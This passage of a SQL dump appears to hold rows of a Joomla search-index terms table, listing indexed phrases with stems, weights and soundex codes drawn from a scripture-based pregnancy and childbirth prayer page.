(222001, 'i am alive', 'i am alive', 0, 1, 1.3333, 'I541', 1, '*'),
(222002, 'i am fearfully', 'i am fearfully', 0, 1, 1.4667, 'I51614', 1, '*'),
(222003, 'i am healthy', 'i am healthy', 0, 1, 1.4, 'I543', 1, '*'),
(222004, 'i am joyful', 'i am joyful', 0, 1, 1.3667, 'I5214', 1, '*'),
(222005, 'i am lively', 'i am lively', 0, 1, 1.3667, 'I5414', 1, '*'),
(222006, 'i am not', 'i am not', 0, 1, 1.2667, 'I530', 1, '*'),
(222007, 'i am redeemed', 'i am redeemed', 0, 1, 1.4333, 'I56353', 1, '*'),
(222008, 'i am still', 'i am still', 0, 1, 1.3333, 'I5234', 1, '*'),
(222009, 'i am strengthened', 'i am strengthened', 0, 1, 1.5667, 'I523652353', 1, '*'),
(222010, 'i awake', 'i awake', 0, 1, 1.2333, 'I200', 1, '*'),
(222011, 'i awake i', 'i awake i', 0, 1, 1.3, 'I200', 1, '*'),
(222012, 'i bare', 'i bare', 0, 1, 1.2, 'I160', 1, '*'),
(222013, 'i bare no', 'i bare no', 0, 1, 1.3, 'I165', 1, '*'),
(222014, 'i bring', 'i bring', 0, 1, 1.2333, 'I1652', 1, '*'),
(222015, 'i bring forth', 'i bring forth', 0, 1, 1.4333, 'I1652163', 1, '*'),
(222016, 'i bring to', 'i bring to', 0, 1, 1.3333, 'I16523', 1, '*'),
(222017, 'i can', 'i can', 0, 1, 1.1667, 'I250', 3, '*'),
(222018, 'i can do', 'i can do', 0, 1, 1.2667, 'I253', 1, '*'),
(222019, 'i carry', 'i carry', 0, 1, 1.2333, 'I260', 1, '*'),
(222020, 'i carry the', 'i carry the', 0, 1, 1.3667, 'I263', 1, '*'),
(222021, 'i cause', 'i cause', 0, 1, 1.2333, 'I200', 1, '*'),
(222022, 'i cause to', 'i cause to', 0, 1, 1.3333, 'I230', 1, '*'),
(222023, 'i come against', 'i come against', 0, 1, 1.4667, 'I252523', 1, '*'),
(222024, 'i conceive', 'i conceive', 0, 1, 1.3333, 'I2521', 1, '*'),
(222025, 'i conceive and', 'i conceive and', 0, 1, 1.4667, 'I252153', 1, '*'),
(222026, 'i declare', 'i declare', 0, 1, 1.3, 'I3246', 1, '*'),
(222027, 'i declare that', 'i declare that', 0, 1, 1.4667, 'I32463', 1, '*'),
(222028, 'i deliver', 'i deliver', 0, 1, 1.3, 'I3416', 1, '*'),
(222029, 'i deliver without', 'i deliver without', 0, 1, 1.5667, 'I34163', 1, '*'),
(222030, 'i do', 'i do', 0, 1, 1.1333, 'I300', 1, '*'),
(222031, 'i do well', 'i do well', 0, 1, 1.3, 'I340', 1, '*'),
(222032, 'i fear', 'i fear', 0, 1, 1.2, 'I160', 1, '*'),
(222033, 'i fear not', 'i fear not', 0, 1, 1.3333, 'I1653', 1, '*'),
(222034, 'i have are', 'i have are', 0, 1, 1.3333, 'I160', 1, '*'),
(222035, 'i have full', 'i have full', 0, 1, 1.3667, 'I140', 1, '*'),
(222036, 'i have gotten', 'i have gotten', 0, 1, 1.4333, 'I1235', 1, '*'),
(222037, 'i have no', 'i have no', 0, 1, 1.3, 'I150', 1, '*'),
(222038, 'i have short', 'i have short', 0, 1, 1.4, 'I1263', 1, '*'),
(222039, 'i have this', 'i have this', 0, 1, 1.3667, 'I132', 1, '*'),
(222040, 'i prosper', 'i prosper', 0, 1, 1.3, 'I16216', 1, '*'),
(222041, 'i prosper in', 'i prosper in', 0, 1, 1.4, 'I162165', 1, '*'),
(222042, 'i receive', 'i receive', 0, 1, 1.3, 'I621', 1, '*'),
(222043, 'i receive god\'s', 'i receive god', 0, 1, 1.5, 'I621232', 1, '*'),
(222044, 'i reject', 'i reject', 0, 1, 1.2667, 'I623', 1, '*'),
(222045, 'i reject early', 'i reject early', 0, 1, 1.4667, 'I62364', 1, '*'),
(222046, 'i reject every', 'i reject every', 0, 1, 1.4667, 'I62316', 1, '*'),
(222047, 'i reject fainting', 'i reject fainting', 0, 1, 1.5667, 'I62315352', 1, '*'),
(222048, 'i reject labor', 'i reject labor', 0, 1, 1.4667, 'I623416', 1, '*'),
(222049, 'i reject oedema', 'i reject oedema', 0, 1, 1.5, 'I6235', 1, '*'),
(222050, 'i should', 'i should', 0, 1, 1.2667, 'I243', 2, '*'),
(222051, 'i should count', 'i should count', 0, 1, 1.4667, 'I243253', 1, '*'),
(222052, 'i travail', 'i travail', 0, 1, 1.3, 'I3614', 1, '*'),
(222053, 'i travail i', 'i travail i', 0, 1, 1.3667, 'I3614', 1, '*'),
(222054, 'i was', 'i was', 0, 1, 1.1667, 'I200', 4, '*'),
(222055, 'i was made', 'i was made', 0, 1, 1.3333, 'I253', 1, '*'),
(222056, 'i will fulfill', 'i will fulfill', 0, 1, 1.4667, 'I41414', 1, '*'),
(222057, 'i will greatly', 'i will greatly', 0, 1, 1.4667, 'I42634', 1, '*'),
(222058, 'i will not', 'i will not', 0, 1, 1.3333, 'I453', 2, '*'),
(222059, 'in christ jesus', 'in christ jesus', 0, 1, 1.5, 'I526232', 2, '*'),
(222060, 'in continuance', 'in continuance', 0, 1, 1.4667, 'I525352', 1, '*'),
(222061, 'in continuance were', 'in continuance were', 0, 1, 1.6333, 'I5253526', 1, '*'),
(222062, 'in goods', 'in goods', 0, 1, 1.2667, 'I5232', 1, '*'),
(222063, 'in goods in', 'in goods in', 0, 1, 1.3667, 'I52325', 1, '*'),
(222064, 'in hard', 'in hard', 0, 1, 1.2333, 'I563', 1, '*'),
(222065, 'in hard labor', 'in hard labor', 0, 1, 1.4333, 'I563416', 1, '*'),
(222066, 'in her', 'in her', 0, 1, 1.2, 'I560', 2, '*'),
(222067, 'in her womb.”', 'in her womb.”', 0, 1, 1.4333, 'I5651', 1, '*'),
(222068, 'in his season', 'in his season', 0, 1, 1.4333, 'I525', 1, '*'),
(222069, 'in jesus gal', 'in jesus gal', 0, 1, 1.4, 'I524', 1, '*'),
(222070, 'in jesus name.”', 'in jesus name.”', 0, 1, 1.5, 'I525', 1, '*'),
(222071, 'in jesus not', 'in jesus not', 0, 1, 1.4, 'I5253', 1, '*'),
(222072, 'in mine', 'in mine', 0, 1, 1.2333, 'I500', 1, '*'),
(222073, 'in mine ears', 'in mine ears', 0, 1, 1.4, 'I562', 1, '*'),
(222074, 'in my case', 'in my case', 0, 1, 1.3333, 'I520', 1, '*'),
(222075, 'in my mother\'s', 'in my mother', 0, 1, 1.4667, 'I5362', 1, '*'),
(222076, 'in my pregnancy', 'in my pregnancy', 0, 1, 1.5, 'I516252', 1, '*'),
(222077, 'in my womb', 'in my womb', 0, 1, 1.3333, 'I510', 1, '*'),
(222078, 'in number than', 'in number than', 0, 1, 1.4667, 'I51635', 1, '*'),
(222079, 'in one day', 'in one day', 0, 1, 1.3333, 'I530', 1, '*'),
(222080, 'in secret', 'in secret', 0, 1, 1.3, 'I5263', 1, '*'),
(222081, 'in secret and', 'in secret and', 0, 1, 1.4333, 'I526353', 1, '*'),
(222082, 'in sorrow', 'in sorrow', 0, 1, 1.3, 'I526', 1, '*'),
(222083, 'in sorrow thou', 'in sorrow thou', 0, 1, 1.4667, 'I5263', 1, '*'),
(222084, 'in the fruit', 'in the fruit', 0, 1, 1.4, 'I53163', 1, '*'),
(222085, 'in the inner', 'in the inner', 0, 1, 1.4, 'I5356', 1, '*'),
(222086, 'in the lowest', 'in the lowest', 0, 1, 1.4333, 'I53423', 1, '*'),
(222087, 'in thy book', 'in thy book', 0, 1, 1.3667, 'I5312', 1, '*'),
(222088, 'in thy land', 'in thy land', 0, 1, 1.3667, 'I53453', 1, '*'),
(222089, 'in unto', 'in unto', 0, 1, 1.2333, 'I530', 1, '*'),
(222090, 'in unto them.”', 'in unto them.”', 0, 1, 1.4667, 'I535', 1, '*'),
(222091, 'incline', 'inclin', 0, 0, 0.4667, 'I5245', 1, '*'),
(222092, 'incline thine', 'inclin thine', 0, 1, 1.4333, 'I524535', 1, '*'),
(222093, 'incline thine ear', 'inclin thine ear', 0, 1, 1.5667, 'I5245356', 1, '*'),
(222094, 'inner and', 'inner and', 0, 1, 1.3, 'I5653', 1, '*'),
(222095, 'inner and outer', 'inner and outer', 0, 1, 1.5, 'I56536', 1, '*'),
(222096, 'is a goodly', 'is a goodly', 0, 1, 1.3667, 'I234', 1, '*'),
(222097, 'is blessed', 'is blessed', 0, 1, 1.3333, 'I21423', 1, '*'),
(222098, 'is blessed my', 'is blessed my', 0, 1, 1.4333, 'I214235', 1, '*'),
(222099, 'is empowered', 'is empowered', 0, 1, 1.4, 'I25163', 1, '*'),
(222100, 'is empowered to', 'is empowered to', 0, 1, 1.5, 'I25163', 1, '*'),
(222101, 'is every', 'is every', 0, 1, 1.2667, 'I216', 1, '*'),
(222102, 'is every one', 'is every one', 0, 1, 1.4, 'I2165', 1, '*'),
(222103, 'is god that', 'is god that', 0, 1, 1.3667, 'I230', 1, '*'),
(222104, 'is my baby\'s', 'is my baby', 0, 1, 1.4, 'I2512', 1, '*'),
(222105, 'is physically', 'is physically', 0, 1, 1.4333, 'I2124', 1, '*'),
(222106, 'is physically active', 'is physically active', 0, 1, 1.6667, 'I2124231', 1, '*'),
(222107, 'is right in', 'is right in', 0, 1, 1.3667, 'I26235', 1, '*'),
(222108, 'is the sum', 'is the sum', 0, 1, 1.3333, 'I2325', 1, '*'),
(222109, 'is written cursed', 'is written cursed', 0, 1, 1.5667, 'I26352623', 1, '*'),
(222110, 'is written therein', 'is written therein', 0, 1, 1.6, 'I2635365', 1, '*'),
(222111, 'isaiah 58', 'isaiah 58', 0, 1, 1.3, 'I200', 1, '*'),
(222112, 'isaiah 58 8', 'isaiah 58 8', 0, 1, 1.3667, 'I200', 1, '*'),
(222113, 'isaiah 66', 'isaiah 66', 0, 1, 1.3, 'I200', 1, '*'),
(222114, 'isaiah 66 11', 'isaiah 66 11', 0, 1, 1.4, 'I200', 1, '*'),
(222115, 'isaiah 66 7', 'isaiah 66 7', 0, 1, 1.3667, 'I200', 1, '*'),
(222116, 'isaiah 66 8', 'isaiah 66 8', 0, 1, 1.3667, 'I200', 1, '*'),
(222117, 'isaiah 66 9', 'isaiah 66 9', 0, 1, 1.3667, 'I200', 1, '*'),
(222118, 'it came', 'it came', 0, 1, 1.2333, 'I325', 2, '*'),
(222119, 'it came to', 'it came to', 0, 1, 1.3333, 'I3253', 1, '*'),
(222120, 'it is god', 'it is god', 0, 1, 1.3, 'I323', 1, '*'),
(222121, 'it is written', 'it is written', 0, 1, 1.4333, 'I32635', 1, '*'),
(222122, 'it pleased', 'it pleased', 0, 1, 1.3333, 'I31423', 1, '*'),
(222123, 'it pleased god', 'it pleased god', 0, 1, 1.4667, 'I3142323', 1, '*'),
(222124, 'item 36', 'item 36', 0, 1, 1.2333, 'I350', 1, '*'),
(222125, 'item 36 scriptural', 'item 36 scriptural', 0, 1, 1.6, 'I35261364', 1, '*'),
(222126, 'jesus gal', 'jesu gal', 0, 1, 1.3, 'J400', 1, '*'),
(222127, 'jesus gal 1', 'jesu gal 1', 0, 1, 1.3667, 'J400', 1, '*'),
(222128, 'jesus isaiah', 'jesu isaiah', 0, 1, 1.4, 'J000', 1, '*'),
(222129, 'jesus isaiah 66', 'jesu isaiah 66', 0, 1, 1.5, 'J000', 1, '*'),
(222130, 'jesus name everyone', 'jesu name everyone', 0, 1, 1.6333, 'J5165', 1, '*'),
(222131, 'jesus name ex', 'jesu name ex', 0, 1, 1.4333, 'J520', 1, '*'),
(222132, 'jesus name fully-developed-baby', 'jesu name fully-developed-baby', 0, 1, 2, 'J514314131', 1, '*'),
(222133, 'jesus name gen', 'jesu name gen', 0, 1, 1.4667, 'J525', 1, '*'),
(222134, 'jesus name isaiah', 'jesu name isaiah', 0, 1, 1.5667, 'J520', 1, '*'),
(222135, 'jesus name my', 'jesu name my', 0, 1, 1.4333, 'J500', 1, '*'),
(222136, 'jesus name the', 'jesu name the', 0, 1, 1.4667, 'J530', 1, '*'),
(222137, 'jesus name.”', 'jesu name.”', 0, 1, 1.4, 'J500', 1, '*'),
(222138, 'jesus name.” ex', 'jesu name.” ex', 0, 1, 1.5, 'J520', 1, '*'),
(222139, 'jesus name.” isaiah', 'jesu name.” isaiah', 0, 1, 1.6333, 'J520', 1, '*'),
(222140, 'jesus not', 'jesu not', 0, 1, 1.3, 'J530', 1, '*'),
(222141, 'jesus not the', 'jesu not the', 0, 1, 1.4333, 'J530', 1, '*'),
(222142, 'job in', 'job in', 0, 1, 1.2, 'J150', 1, '*'),
(222143, 'job in jesus', 'job in jesus', 0, 1, 1.4, 'J152', 1, '*'),
(222144, 'joshua 1', 'joshua 1', 0, 1, 1.2667, 'J000', 1, '*'),
(222145, 'joshua 1 8', 'joshua 1 8', 0, 1, 1.3333, 'J000', 1, '*'),
(222146, 'joy.”', 'joy.”', 0, 0, 0.3333, 'J000', 1, '*'),
(222147, 'joy.” my', 'joy.” my', 0, 1, 1.2667, 'J500', 1, '*'),
(222148, 'joy.” my baby', 'joy.” my baby', 0, 1, 1.4333, 'J510', 1, '*'),
(222149, 'joyful', 'joy', 0, 0, 0.4, 'J140', 1, '*'),
(222150, 'joyful mother', 'joy mother', 0, 1, 1.4333, 'J14536', 1, '*'),
(222151, 'joyful mother of', 'joy mother of', 0, 1, 1.5333, 'J145361', 1, '*'),
(222152, 'k2 item 36', 'k2 item 36', 0, 1, 1.3333, 'K350', 1, '*'),
(222153, 'keep house', 'keep house', 0, 1, 1.3333, 'K120', 1, '*'),
(222154, 'keep house and', 'keep house and', 0, 1, 1.4667, 'K1253', 1, '*'),
(222155, 'keep them', 'keep them', 0, 1, 1.3, 'K135', 1, '*'),
(222156, 'keep them in', 'keep them in', 0, 1, 1.4, 'K135', 1, '*'),
(222157, 'knew', 'knew', 0, 0, 0.2667, 'K500', 2, '*'),
(222158, 'knew eve', 'knew eve', 0, 1, 1.2667, 'K510', 1, '*'),
(222159, 'knew eve his', 'knew eve his', 0, 1, 1.4, 'K512', 1, '*'),
(222160, 'knife', 'knife', 0, 0, 0.3333, 'K510', 1, '*'),
(222161, 'knife of', 'knife of', 0, 1, 1.2667, 'K510', 1, '*'),
(222162, 'knife of surgeons', 'knife of surgeons', 0, 1, 1.5667, 'K5126252', 1, '*'),
(222163, 'knoweth', 'knoweth', 0, 0, 0.4667, 'K530', 1, '*'),
(222164, 'knoweth right', 'knoweth right', 0, 1, 1.4333, 'K53623', 1, '*'),
(222165, 'knoweth right well.”', 'knoweth right well.”', 0, 1, 1.6667, 'K536234', 1, '*'),
(222166, 'labor ..”', 'labor ..”', 0, 1, 1.3, 'L160', 1, '*'),
(222167, 'labor ..” i', 'labor ..” i', 0, 1, 1.3667, 'L160', 1, '*'),
(222168, 'labor during', 'labor during', 0, 1, 1.4, 'L163652', 1, '*'),
(222169, 'labor during my', 'labor during my', 0, 1, 1.5, 'L1636525', 1, '*'),
(222170, 'labor pain', 'labor pain', 0, 1, 1.3333, 'L1615', 1, '*'),
(222171, 'labor pain i', 'labor pain i', 0, 1, 1.4, 'L1615', 1, '*'),
(222172, 'labor pain in', 'labor pain in', 0, 1, 1.4333, 'L1615', 1, '*'),
(222173, 'labor that', 'labor that', 0, 1, 1.3333, 'L163', 1, '*'),
(222174, 'labor that the', 'labor that the', 0, 1, 1.4667, 'L163', 1, '*'),
(222175, 'labour period', 'labour period', 0, 1, 1.4333, 'L16163', 1, '*'),
(222176, 'labour period the', 'labour period the', 0, 1, 1.5667, 'L16163', 1, '*'),
(222177, 'land the', 'land the', 0, 1, 1.2667, 'L530', 3, '*'),
(222178, 'land the number', 'land the number', 0, 1, 1.5, 'L53516', 1, '*'),
(222179, 'law', 'law', 0, 0, 0.2, 'L000', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(222180, 'law being', 'law being', 0, 1, 1.3, 'L152', 1, '*'),
(222181, 'law being made', 'law being made', 0, 1, 1.4667, 'L15253', 1, '*'),
(222182, 'law i', 'law i', 0, 1, 1.1667, 'L000', 1, '*'),
(222183, 'law i am', 'law i am', 0, 1, 1.2667, 'L500', 1, '*'),
(222184, 'law shall', 'law shall', 0, 1, 1.3, 'L240', 1, '*'),
(222185, 'law shall not', 'law shall not', 0, 1, 1.4333, 'L2453', 1, '*'),
(222186, 'leaf also', 'leaf also', 0, 1, 1.3, 'L142', 1, '*'),
(222187, 'leaf also shall', 'leaf also shall', 0, 1, 1.5, 'L1424', 1, '*'),
(222188, 'leaped', 'leap', 0, 0, 0.4, 'L130', 1, '*'),
(222189, 'leaped in', 'leap in', 0, 1, 1.3, 'L135', 1, '*'),
(222190, 'leaped in my', 'leap in my', 0, 1, 1.4, 'L135', 1, '*'),
(222191, 'least', 'least', 0, 0, 0.3333, 'L230', 2, '*'),
(222192, 'least 3', 'least 3', 0, 1, 1.2333, 'L230', 1, '*'),
(222193, 'least 3 times', 'least 3 times', 0, 1, 1.4333, 'L2352', 1, '*'),
(222194, 'let them not', 'let them not', 0, 1, 1.4, 'L353', 1, '*'),
(222195, 'life unto', 'life unto', 0, 1, 1.3, 'L153', 1, '*'),
(222196, 'life unto those', 'life unto those', 0, 1, 1.5, 'L1532', 1, '*'),
(222197, 'light break', 'light break', 0, 1, 1.3667, 'L23162', 1, '*'),
(222198, 'light break forth', 'light break forth', 0, 1, 1.5667, 'L23162163', 1, '*'),
(222199, 'like a tree', 'like a tree', 0, 1, 1.3667, 'L236', 1, '*'),
(222200, 'lively', 'live', 0, 0, 0.4, 'L140', 1, '*'),
(222201, 'lively and', 'live and', 0, 1, 1.3333, 'L1453', 1, '*'),
(222202, 'lively and are', 'live and are', 0, 1, 1.4667, 'L14536', 1, '*'),
(222203, 'lively i', 'live i', 0, 1, 1.2667, 'L140', 1, '*'),
(222204, 'lively i am', 'live i am', 0, 1, 1.3667, 'L145', 1, '*'),
(222205, 'lk', 'lk', 0, 0, 0.1333, 'L200', 1, '*'),
(222206, 'lk 2', 'lk 2', 0, 1, 1.1333, 'L200', 1, '*'),
(222207, 'lk 2 6.”', 'lk 2 6.”', 0, 1, 1.2667, 'L200', 1, '*'),
(222208, 'lo', 'lo', 0, 0, 0.1333, 'L000', 1, '*'),
(222209, 'lo as', 'lo as', 0, 1, 1.1667, 'L200', 1, '*'),
(222210, 'lo as soon', 'lo as soon', 0, 1, 1.3333, 'L250', 1, '*'),
(222211, 'lord and he\'ll', 'lord and he', 0, 1, 1.4667, 'L63534', 1, '*'),
(222212, 'lord cut', 'lord cut', 0, 1, 1.2667, 'L6323', 1, '*'),
(222213, 'lord cut short', 'lord cut short', 0, 1, 1.4667, 'L6323263', 1, '*'),
(222214, 'lord shall i', 'lord shall i', 0, 1, 1.4, 'L6324', 1, '*'),
(222215, 'lord shall make', 'lord shall make', 0, 1, 1.5, 'L632452', 1, '*'),
(222216, 'lord.”', 'lord.”', 0, 0, 0.4, 'L630', 1, '*'),
(222217, 'lord.” gen', 'lord.” gen', 0, 1, 1.3333, 'L6325', 1, '*'),
(222218, 'lord.” gen 4', 'lord.” gen 4', 0, 1, 1.4, 'L6325', 1, '*'),
(222219, 'lord.” i', 'lord.” i', 0, 1, 1.2667, 'L630', 1, '*'),
(222220, 'lord.” i am', 'lord.” i am', 0, 1, 1.3667, 'L635', 1, '*'),
(222221, 'lowest parts', 'lowest parts', 0, 1, 1.4, 'L231632', 1, '*'),
(222222, 'lowest parts of', 'lowest parts of', 0, 1, 1.5, 'L2316321', 1, '*'),
(222223, 'luke 1', 'luke 1', 0, 1, 1.2, 'L200', 1, '*'),
(222224, 'luke 1 44', 'luke 1 44', 0, 1, 1.3, 'L200', 1, '*'),
(222225, 'luke 1 57', 'luke 1 57', 0, 1, 1.3, 'L200', 1, '*'),
(222226, 'made a curse', 'made a curse', 0, 1, 1.4, 'M3262', 1, '*'),
(222227, 'made gen', 'made gen', 0, 1, 1.2667, 'M325', 1, '*'),
(222228, 'made gen 35', 'made gen 35', 0, 1, 1.3667, 'M325', 1, '*'),
(222229, 'made in', 'made in', 0, 1, 1.2333, 'M350', 1, '*'),
(222230, 'made in secret', 'made in secret', 0, 1, 1.4667, 'M35263', 1, '*'),
(222231, 'made marvelous', 'made marvelous', 0, 1, 1.4667, 'M356142', 1, '*'),
(222232, 'made marvelous are', 'made marvelous are', 0, 1, 1.6, 'M3561426', 1, '*'),
(222233, 'made to', 'made to', 0, 1, 1.2333, 'M300', 1, '*'),
(222234, 'made to bring', 'made to bring', 0, 1, 1.4333, 'M31652', 1, '*'),
(222235, 'make thee', 'make thee', 0, 1, 1.3, 'M230', 1, '*'),
(222236, 'make thee plenteous', 'make thee plenteous', 0, 1, 1.6333, 'M2314532', 1, '*'),
(222237, 'make thy', 'make thy', 0, 1, 1.2667, 'M230', 1, '*'),
(222238, 'make thy way', 'make thy way', 0, 1, 1.4, 'M230', 1, '*'),
(222239, 'makes difficult', 'make difficult', 0, 1, 1.5, 'M231243', 1, '*'),
(222240, 'makes difficult things', 'make difficult things', 0, 1, 1.7333, 'M23124352', 1, '*'),
(222241, 'maketh', 'maketh', 0, 0, 0.4, 'M230', 1, '*'),
(222242, 'maketh the', 'maketh the', 0, 1, 1.3333, 'M230', 1, '*'),
(222243, 'maketh the barren', 'maketh the barren', 0, 1, 1.5667, 'M23165', 1, '*'),
(222244, 'malformation', 'malform', 0, 0, 0.8, 'M416535', 1, '*'),
(222245, 'malformation not', 'malform not', 0, 1, 1.5333, 'M4165353', 1, '*'),
(222246, 'malformation not subject', 'malform not subject', 0, 1, 1.8, 'M41653532123', 1, '*'),
(222247, 'man child', 'man child', 0, 1, 1.3, 'M243', 1, '*'),
(222248, 'man child i', 'man child i', 0, 1, 1.3667, 'M243', 1, '*'),
(222249, 'man from', 'man from', 0, 1, 1.2667, 'M165', 1, '*'),
(222250, 'man from the', 'man from the', 0, 1, 1.4, 'M1653', 1, '*'),
(222251, 'man luke', 'man luke', 0, 1, 1.2667, 'M420', 1, '*'),
(222252, 'man luke 1', 'man luke 1', 0, 1, 1.3333, 'M420', 1, '*'),
(222253, 'marvelous', 'marvel', 0, 0, 0.6, 'M6142', 1, '*'),
(222254, 'marvelous are', 'marvel are', 0, 1, 1.4333, 'M61426', 1, '*'),
(222255, 'marvelous are thy', 'marvel are thy', 0, 1, 1.5667, 'M614263', 1, '*'),
(222256, 'may milk', 'mai milk', 0, 1, 1.2667, 'M420', 1, '*'),
(222257, 'may milk out', 'mai milk out', 0, 1, 1.4, 'M423', 1, '*'),
(222258, 'may suck', 'mai suck', 0, 1, 1.2667, 'M200', 1, '*'),
(222259, 'may suck and', 'mai suck and', 0, 1, 1.4, 'M253', 1, '*'),
(222260, 'mayest', 'mayest', 0, 0, 0.4, 'M230', 1, '*'),
(222261, 'mayest observe', 'mayest observe', 0, 1, 1.4667, 'M231261', 1, '*'),
(222262, 'mayest observe to', 'mayest observe to', 0, 1, 1.5667, 'M2312613', 1, '*'),
(222263, 'me before', 'me before', 0, 1, 1.3, 'M160', 1, '*'),
(222264, 'me before during', 'me before during', 0, 1, 1.5333, 'M163652', 1, '*'),
(222265, 'me by', 'me by', 0, 1, 1.1667, 'M100', 1, '*'),
(222266, 'me by his', 'me by his', 0, 1, 1.3, 'M120', 1, '*'),
(222267, 'me from my', 'me from my', 0, 1, 1.3333, 'M165', 1, '*'),
(222268, 'me i', 'me i', 0, 1, 1.1333, 'M000', 1, '*'),
(222269, 'me i am', 'me i am', 0, 1, 1.2333, 'M000', 1, '*'),
(222270, 'me in my', 'me in my', 0, 1, 1.2667, 'M000', 1, '*'),
(222271, 'me o', 'me o', 0, 1, 1.1333, 'M000', 1, '*'),
(222272, 'me o god', 'me o god', 0, 1, 1.2667, 'M230', 1, '*'),
(222273, 'me therefore', 'me therefore', 0, 1, 1.4, 'M3616', 1, '*'),
(222274, 'me therefore ye', 'me therefore ye', 0, 1, 1.5, 'M3616', 1, '*'),
(222275, 'me.”', 'me.”', 0, 0, 0.2667, 'M000', 2, '*'),
(222276, 'me.” i', 'me.” i', 0, 1, 1.2, 'M000', 1, '*'),
(222277, 'me.” i can', 'me.” i can', 0, 1, 1.3333, 'M250', 1, '*'),
(222278, 'meditate therein', 'medit therein', 0, 1, 1.5333, 'M365', 1, '*'),
(222279, 'meditate therein day', 'medit therein day', 0, 1, 1.6667, 'M3653', 1, '*'),
(222280, 'members', 'member', 0, 0, 0.4667, 'M162', 3, '*'),
(222281, 'members were', 'member were', 0, 1, 1.4, 'M1626', 1, '*'),
(222282, 'members were written', 'member were written', 0, 1, 1.6667, 'M162635', 1, '*'),
(222283, 'men.”', 'men.”', 0, 0, 0.3333, 'M000', 1, '*'),
(222284, 'men.” this', 'men.” this', 0, 1, 1.3333, 'M320', 1, '*'),
(222285, 'men.” this is', 'men.” this is', 0, 1, 1.4333, 'M320', 1, '*'),
(222286, 'midst of thine', 'midst of thine', 0, 1, 1.4667, 'M323135', 1, '*'),
(222287, 'midwife', 'midwif', 0, 0, 0.4667, 'M310', 1, '*'),
(222288, 'midwife said', 'midwif said', 0, 1, 1.4, 'M3123', 1, '*'),
(222289, 'midwife said unto', 'midwif said unto', 0, 1, 1.5667, 'M312353', 1, '*'),
(222290, 'midwives', 'midwiv', 0, 0, 0.5333, 'M312', 1, '*'),
(222291, 'midwives come', 'midwiv come', 0, 1, 1.4333, 'M3125', 1, '*'),
(222292, 'midwives come in', 'midwiv come in', 0, 1, 1.5333, 'M3125', 1, '*'),
(222293, 'midwives doctors', 'midwiv doctors', 0, 1, 1.5333, 'M31232362', 1, '*'),
(222294, 'midwives doctors and', 'midwiv doctors and', 0, 1, 1.6667, 'M3123236253', 1, '*'),
(222295, 'midwives said', 'midwiv said', 0, 1, 1.4333, 'M3123', 1, '*'),
(222296, 'midwives said unto', 'midwiv said unto', 0, 1, 1.6, 'M312353', 1, '*'),
(222297, 'milk', 'milk', 0, 0, 0.2667, 'M420', 1, '*'),
(222298, 'milk in', 'milk in', 0, 1, 1.2333, 'M425', 1, '*'),
(222299, 'milk in jesus', 'milk in jesus', 0, 1, 1.4333, 'M4252', 1, '*'),
(222300, 'milk out', 'milk out', 0, 1, 1.2667, 'M423', 1, '*'),
(222301, 'milk out and', 'milk out and', 0, 1, 1.4, 'M42353', 1, '*'),
(222302, 'mine', 'mine', 0, 0, 0.2667, 'M000', 1, '*'),
(222303, 'mine ears', 'mine ears', 0, 1, 1.3, 'M620', 1, '*'),
(222304, 'mine ears babe', 'mine ears babe', 0, 1, 1.4667, 'M621', 1, '*'),
(222305, 'miscarriage', 'miscarriag', 0, 0, 0.7333, 'M262', 1, '*'),
(222306, 'miscarriage in', 'miscarriag in', 0, 1, 1.4667, 'M2625', 1, '*'),
(222307, 'miscarriage in jesus', 'miscarriag in jesus', 0, 1, 1.6667, 'M26252', 1, '*'),
(222308, 'months.”', 'months.”', 0, 0, 0.5333, 'M320', 1, '*'),
(222309, 'months.” my', 'months.” my', 0, 1, 1.3667, 'M325', 1, '*'),
(222310, 'months.” my baby', 'months.” my baby', 0, 1, 1.5333, 'M3251', 1, '*'),
(222311, 'more in', 'more in', 0, 1, 1.2333, 'M650', 1, '*'),
(222312, 'more in number', 'more in number', 0, 1, 1.4667, 'M6516', 1, '*'),
(222313, 'more you can', 'more you can', 0, 1, 1.4, 'M625', 1, '*'),
(222314, 'morning afternoon', 'morn afternoon', 0, 1, 1.5667, 'M6521365', 1, '*'),
(222315, 'morning afternoon and', 'morn afternoon and', 0, 1, 1.7, 'M65213653', 1, '*'),
(222316, 'morning and', 'morn and', 0, 1, 1.3667, 'M65253', 1, '*'),
(222317, 'morning and thine', 'morn and thine', 0, 1, 1.5667, 'M652535', 1, '*'),
(222318, 'morning sickness', 'morn sickness', 0, 1, 1.5333, 'M65252', 1, '*'),
(222319, 'morning sickness reject', 'morn sickness reject', 0, 1, 1.7667, 'M65252623', 1, '*'),
(222320, 'mother of', 'mother of', 0, 1, 1.3, 'M361', 3, '*'),
(222321, 'mother of children', 'mother of children', 0, 1, 1.6, 'M36124365', 1, '*'),
(222322, 'mother\'s', 'mother', 0, 0, 0.5333, 'M362', 1, '*'),
(222323, 'mother\'s womb', 'mother womb', 0, 1, 1.4333, 'M36251', 1, '*'),
(222324, 'mother\'s womb and', 'mother womb and', 0, 1, 1.5667, 'M3625153', 1, '*'),
(222325, 'mother\'s womb.”', 'mother womb.”', 0, 1, 1.5, 'M36251', 1, '*'),
(222326, 'mother\'s womb.” 14', 'mother womb.” 14', 0, 1, 1.6, 'M36251', 1, '*'),
(222327, 'mouth but', 'mouth but', 0, 1, 1.3, 'M313', 1, '*'),
(222328, 'mouth but thou', 'mouth but thou', 0, 1, 1.4667, 'M313', 1, '*'),
(222329, 'multiply', 'multipli', 0, 0, 0.5333, 'M4314', 1, '*'),
(222330, 'multiply thy', 'multipli thy', 0, 1, 1.4, 'M43143', 1, '*'),
(222331, 'multiply thy sorrow', 'multipli thy sorrow', 0, 1, 1.6333, 'M4314326', 1, '*'),
(222332, 'my baby', 'my baby', 0, 1, 1.2333, 'M100', 1, '*'),
(222333, 'my baby and', 'my baby and', 0, 1, 1.3667, 'M153', 1, '*'),
(222334, 'my baby from', 'my baby from', 0, 1, 1.4, 'M165', 1, '*'),
(222335, 'my baby grows', 'my baby grows', 0, 1, 1.4333, 'M1262', 1, '*'),
(222336, 'my baby is', 'my baby is', 0, 1, 1.3333, 'M120', 1, '*'),
(222337, 'my baby sucks', 'my baby sucks', 0, 1, 1.4333, 'M120', 1, '*'),
(222338, 'my baby\'s', 'my baby', 0, 1, 1.3, 'M120', 1, '*'),
(222339, 'my baby\'s experience', 'my baby experience', 0, 1, 1.6667, 'M121652', 1, '*'),
(222340, 'my body', 'my body', 0, 1, 1.2333, 'M130', 1, '*'),
